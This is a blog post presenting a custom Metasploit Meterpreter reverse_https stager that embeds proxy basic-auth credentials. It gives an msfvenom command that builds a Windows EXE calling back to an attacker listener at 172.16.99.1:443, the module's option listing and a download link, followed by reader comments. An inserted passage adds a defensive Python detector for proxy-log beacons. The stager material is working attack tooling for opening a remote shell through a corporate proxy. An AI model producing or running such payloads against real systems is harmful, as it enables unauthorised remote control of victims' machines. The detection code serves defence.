
Metasploit stager: reverse_https with basic authentication against proxy

by foip on October 13th, 2012

1. Introduction

While reverse_https does an amazing job of supporting proxy servers and NTLM authentication, there are situations where the proxy server only handles basic authentication and you hold a valid username and password pair.

Unlike NTLM, the username and password used for basic authentication remain in the scope of the authenticating process (for example, your browser after a successful authentication against the proxy server). This is why reverse_http(s) knows nothing about this password: the reverse_http(s) stager uses the WinInet API and lets Windows manage how to reach the Internet.

Back to basic authentication: this customized version of reverse_https lets you embed a valid username and password inside the payload, allowing proper basic authentication against the proxy server. The proxy settings (IP, port, proxy.pac, …) are still managed automatically by WinInet.

2. Usage example

2.1. EXE generation

msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
  -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
  PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe

2.2. Module info

msf  > info payload/windows/meterpreter/reverse_https_proxy_basicauth

       Name: Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (proxy basic auth)
     Module: payload/windows/meterpreter/reverse_https_proxy_basicauth
    Version: 1, 15548, 14976
   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 425
       Rank: Normal

Provided by:
  skape
  sf
  hdm

Basic options:
Name             Current Setting  Required  Description
----             ---------------  --------  -----------
EXITFUNC         process          yes       Exit technique: seh, thread, process, none
LHOST                             yes       The local listener hostname
LPORT            8443             yes       The local listener port
PROXY_AUTH_PASS  pass123          yes       Proxy authentication (password)
PROXY_AUTH_USER  username         yes       Proxy authentication (username)

Description:
  Tunnel communication over HTTP using SSL, using hardcoded proxy auth 
  settings, Inject the meterpreter server DLL via the Reflective Dll 
  Injection payload (staged)
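The stager above authenticates to the proxy as the embedded account for every CONNECT towards LHOST:LPORT, which makes the proxy's own access log the place where a defender sees it. As an added example (not from the original post or the module), here is a Python check over constructed Squid-style log lines that flags authenticated CONNECTs to a bare IP which recur at a steady interval from one client, or which reuse one proxy account from several client hosts; the log format, the client addresses and the jsmith account are assumptions.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed Squid-style access log lines (not from the original post). Fields:
# epoch elapsed_ms client action/code bytes method dest proxy_user hierarchy type
SAMPLE_LOG = """\
1350115200.101 45 10.0.0.12 TCP_TUNNEL/200 5120 CONNECT 172.16.99.1:443 mylongusername HIER_DIRECT/172.16.99.1 -
1350115260.204 40 10.0.0.12 TCP_TUNNEL/200 4096 CONNECT 172.16.99.1:443 mylongusername HIER_DIRECT/172.16.99.1 -
1350115320.310 43 10.0.0.12 TCP_TUNNEL/200 4096 CONNECT 172.16.99.1:443 mylongusername HIER_DIRECT/172.16.99.1 -
1350115331.000 120 10.0.0.34 TCP_TUNNEL/200 9000 CONNECT www.example.com:443 jsmith HIER_DIRECT/203.0.113.10 -
1350115400.000 90 10.0.0.77 TCP_TUNNEL/200 8000 CONNECT 172.16.99.1:443 mylongusername HIER_DIRECT/172.16.99.1 -
"""
LINE_RE = re.compile(r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+\s+"
                     r"(?P<method>\S+)\s+(?P<dest>\S+)\s+(?P<user>\S+)\s+\S+\s+\S+$")

def is_bare_ip(host):
    try:  # literal IP target (like LHOST=172.16.99.1) rather than a hostname
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def parse(log_text):
    """Yield (timestamp, client, method, host, port, proxy_user) per well-formed line."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            host, _, port = m["dest"].rpartition(":")
            yield float(m["ts"]), m["client"], m["method"], host, port, m["user"]

def find_suspect_tunnels(log_text, min_hits=3, max_jitter=5.0):
    """Group authenticated CONNECTs to bare IPs by (user, host, port); flag a group when one
    client repeats it at a near-constant interval or the same account shows up from several hosts."""
    groups = defaultdict(lambda: defaultdict(list))
    for ts, client, method, host, port, user in parse(log_text):
        if method == "CONNECT" and user != "-" and is_bare_ip(host):
            groups[(user, host, port)][client].append(ts)
    findings = {}
    for key, per_client in groups.items():
        regular = False
        for stamps in per_client.values():  # log lines are assumed chronological
            gaps = [b - a for a, b in zip(stamps, stamps[1:])]
            if len(stamps) >= min_hits and max(gaps) - min(gaps) <= max_jitter:
                regular = True
        if regular or len(per_client) > 1:
            findings[key] = {"hits": sum(map(len, per_client.values())),
                             "clients": sorted(per_client), "regular_beacon": regular}
    return findings
```

On the sample above the jsmith tunnel to a hostname is ignored, while the mylongusername tunnels to 172.16.99.1:443 are reported both for their 60-second cadence and for appearing from two client hosts.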

3. Download

Link : reverse_https_proxy_basicauth.tar.gz

Enjoy :)


© 2012 – 2013, Fun Over IP. All rights reserved.


9 Comments
  1. Great job!!!
    Do we need a proxy server to handle authentication? TKS D:)

    • foip permalink

      Hi, Thanks for your comment!
      But I’m not sure I understand your question :)

  2. Thanks for the great write up. I just want to ask why we need to specify the username/password in the handler? Don’t you think that once the payload reaches our handler, all we need to do is send the second stage and that is it? We don’t need to match each and every option for that matter.

    But really appreciate the great articles you have. The AV stuff is my favorite!

    • foip permalink

      Hi, thank you for your valuable remark.

      Indeed, there is absolutely no need to provide the username/password in the handler. The goal was only to show the available options of the payload. They only make sense when used with an exploit module. The username/password of the proxy will not be used by multi/handler.
      So it is not a good example :)

      I will update the post asap.

      Thanks!

  3. damien permalink

    Nice module. However..

    I think it would be good to have an optional field to indicate the IP address of the proxy instead of automatically getting it from WinInet. : )

    • foip permalink

      I did that in a first attempt but it didn’t work.
      Unfortunately, stage2 keeps using WinInet with the autoconfig option for the proxy settings and so doesn’t use the IP you provided in stage1.
      Thanks for the comment.

      • damien permalink

        Hi,

        Do you mind sharing with me the stage1 source code you wrote that supports using a proxy IP given as a setting? I do not know how to write stage1 for meterpreter, however maybe I can help to analyse and write stage2?

        Thank you. : )

  4. damien permalink

    Hi,

    Just saw there is a project doing a reverse https_proxy module that allows a proxy IP and port to be defined: https://github.com/rapid7/metasploit-framework/pull/1044 . I am wondering whether your module can be integrated with the upcoming new module?

    • foip permalink

      Hi Damien, and sorry for the delay in my responses to your last two comments..
      Thanks for pointing out corelanc0d3r’s tool, it looks very nice! My added “feature” is quite easy to implement, therefore I asked corelanc0d3r if it would be possible to add it to his project, as he already did the biggest part of the job. I haven’t got a reply yet, but will keep you up to date on that matter :)

      Cheers!

